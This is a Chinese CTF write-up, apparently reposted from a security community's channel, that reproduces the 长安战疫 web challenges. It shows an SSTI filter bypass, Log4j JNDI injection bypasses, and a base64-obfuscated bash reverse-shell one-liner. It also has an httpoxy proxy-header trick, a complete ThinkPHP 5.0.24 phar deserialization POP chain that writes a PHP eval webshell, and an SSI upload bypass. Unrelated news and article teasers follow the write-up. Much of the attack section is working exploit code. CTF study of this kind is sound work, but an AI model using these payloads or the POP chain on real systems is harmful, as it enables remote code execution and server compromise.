长安战疫WEB全复现
白帽子社区
共 858字,需浏览 2分钟
· 2022-01-22
本文来自“白帽子社区知识星球”
作者:tzzzez
RCE_NO_Param
无参数rce,各种花式套路挺多的,原本WHT战队的WP中也有,不再复现。
flask
python的flask框架
提示先登录,查看源码
需要绕过.js?后缀
通过参数name进行SSTI注入
这里的后缀仍需要为.js?,因此无法使用tplmap工具进行反弹shell,但是tplmap可以探测出name是存在注入的。
直接进行SSTI注入,发现存在过滤,使用unicode编码进行bypass
springboot项目,shiro,log4j,fj漏洞都可以架构。
尝试shiro,关键字为rememberme,连上后好像并没有任何用。
抓包显示也不可能是fj,所以最后只剩log4j,尝试一下dns回显。
jndi被过滤,这里可以使用大小写绕过
也可以使用
${${::-j}ndi:rmi://ip:port/exp}
这里使用base64进行一个bypass之后反弹shell,在VPS上架JNDI服务器,并开启监听对应端口
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNzc3NyAwPiYx}|{base64,-d}|{bash,-i}
选取springboot环境的payload进行发送
jdni服务器收到回显信息,并且反弹的端口也获取shell。
ttpproxy的cve(CVE-2016-5387)
抓包,在header中添加proxy:http://VPS:port即可
tp
显示是TP5.0,利用报错显示具体TP版本信息
V5.0.24,该版本rce被修复,只能上传phar实现反序列化,网上链子一堆
namespace think\process\pipes {
class Windows {
private $files = [];
public function __construct($files)
{
$this->files = [$files];
}
}
}
namespace think {
abstract class Model{
protected $append = [];
protected $error = null;
public $parent;
function __construct($output, $modelRelation)
{
$this->parent = $output;
$this->append = array("xxx"=>"getError");
$this->error = $modelRelation;
}
}
}
namespace think\model{
use think\Model;
class Pivot extends Model{
function __construct($output, $modelRelation)
{
parent::__construct($output, $modelRelation);
}
}
}
namespace think\model\relation{
class HasOne extends OneToOne {
}
}
namespace think\model\relation {
abstract class OneToOne
{
protected $selfRelation;
protected $bindAttr = [];
protected $query;
function __construct($query)
{
$this->selfRelation = 0;
$this->query = $query; //$query指向Query
$this->bindAttr = ['xxx'];// $value值,作为call函数引用的第二变量
}
}
}
namespace think\db {
class Query {
protected $model;
function __construct($model)
{
$this->model = $model; //$this->model=> think\console\Output;
}
}
}
namespace think\console{
class Output{
private $handle;
protected $styles;
function __construct($handle)
{
$this->styles = ['getAttr'];
$this->handle =$handle; //$handle->think\session\driver\Memcached
}
}
}
namespace think\session\driver {
class Memcached
{
protected $handler;
function __construct($handle)
{
$this->handler = $handle; //$handle->think\cache\driver\File
}
}
}
namespace think\cache\driver {
class File
{
protected $options=null;
protected $tag;
function __construct(){
$this->options=[
'expire' => 3600,
'cache_subdir' => false,
'prefix' => '',
'path' => 'php://filter/convert.iconv.utf-8.utf-7|convert.base64-decode/resource=aaaPD9waHAgQGV2YWwoJF9QT1NUWydjY2MnXSk7Pz4g/../../../../../../../../../../var/www/html/',
'data_compress' => false,
];
$this->tag = 'xxx';
}
}
}
namespace {
$Memcached = new think\session\driver\Memcached(new \think\cache\driver\File());
$Output = new think\console\Output($Memcached);
$model = new think\db\Query($Output);
$HasOne = new think\model\relation\HasOne($model);
$window = new think\process\pipes\Windows(new think\model\Pivot($Output,$HasOne));
$phar = new Phar("phar.phar");
$phar->startBuffering();
$phar->setStub("");
$phar->setMetadata($window);
$phar->addFromString("test.txt", "test");
$phar->stopBuffering();
}upload
SSI注入
上传Bypass
上传禁止了php,htaccess和ini
使用shtml进行绕过
#ls被过滤,使用dir
#两种读取方式
如果觉得本文不错的话,欢迎加入知识星球,星球内部设立了多个技术版块,目前涵盖“WEB安全”、“内网渗透”、“CTF技术区”、“漏洞分析”、“工具分享”五大类,还可以与嘉宾大佬们接触,在线答疑、互相探讨。
▼扫码关注白帽子社区公众号&加入知识星球▼
评论
特斯拉中国Model Y、S、X全系降价;盒马否认侯毅张勇出价20亿美元联手买下盒马;瑞幸回应“不招聘上海人”
特斯拉中国Model Y、S、X全系降价特斯拉中国Model Y售价降至24.99万元人民币,MODEL Y长续航版售价降至29.09万元人民币。特斯拉中国 MODEL Y高性能版售价降至35.49万元人民币。特斯拉中国MODEL S售价降至68.49万元人民币。特斯拉中国 MODEL S PLAI
亿欧网
0
互联网晚报 | 央视发文谈调休:原则是最小干预;特斯拉中国全系降价;二手交易平台现大量转卖SU7创始车型订单
央视发文谈调休:原则是最小干预“五一其实只放一天”近日冲上热搜,再度引发“假期该不该调休”的热议。如何调休,也有讲究。一个基本原则是,“最小干预,尽量不打乱人们的正常生活节奏”。我国现行法定节假日总天数为11天,周末休息104天,带薪休假5~15天,总假期天数在国际上处于中等偏上水平。专家指出,“之
产品刘
0
【大模型】RAG全链路的关键模块解析
原文:https://zhuanlan.zhihu.com/p/682253496整理:青稞AI1. 背景介绍RAG(Retrieval Augmented Generation,检索增强生成 )方法是指结合了基于检索的模型和生成模型的能力,以提高生成文本的质量和相关性。该方法是Meta在2020年
机器学习算法与Python实战
32
隐藏iPhone底部Dock栏壁纸,全机型适用!
一共分享了7张隐藏iPhone底部Dock栏壁纸,黑色需要打开深色模式识别下方二维码可以前去下载原图---------图片搜集自网络,仅作壁纸分享用途.如有侵犯您的权益,请联系我们删除.觉得不错的就点个“在看”吧
宅哥技术
0
某网友吐槽:全行业都在把阿里巴巴p7往绝路逼啊,小红书p7现在只给R5,字节现在p7现在只给2-2,爱来不来。
架构师大咖
架构师大咖,打造有价值的架构师交流平台。分享架构师干货、教程、课程、资讯。架构师大咖,每日推送。
公众号该公众号已被封禁某网友吐槽,现在全行业都在把阿里巴巴集团P7往绝路
源码共读
0
超给力,从计算机基础到云原生容器化,83 张全领域高清思维导图免费下载!
今天给大家推荐一个开源项目是「learning_mind_map」,【思维导图】盒子,涉及的方向有 C/C++,Golang,Linux,云原生,数据库,DPDK,音视频开发,TCP/IP,数据结构,计算机原理等等。每个方向底下还有很多细分的子方向,每个子方向包含一张或几张思维导图,共 81 张,帮
开源Linux
10
贾佳亚团队新模型对标ChatGPT+DALL-E 3王炸组合!读懂梗图刷爆榜单,代码复现数学函数
来源:新智元【导读】贾佳亚团队提出VLM模型Mini-Gemini,堪比GPT-4+DALL-E 3王炸组合,一上线就刷爆了多模态任务榜单!读得懂梗图,做得了学术,用代码就能复现数学函数图。刷爆多模态任务榜单,超强视觉语言模型Mini-Gemini来了!效果堪称是开源社区版的GPT-4+DALL-E
AI算法与图像处理
10
小红书运营全流程&爆文创作攻略.pdf
来源:XXX公众号后台回复: 报告 获取源文件欢迎添加本站微信:datajh(可上下滑动或点单个图片放大左右滑动查看)知识星球历史已上传相关资料概览:报告已同步至知识星球,需要源文件请公众号后台回复:报告报告仅做分享交流,文章开头已注明来源,如有侵权,请联
数据D江湖
10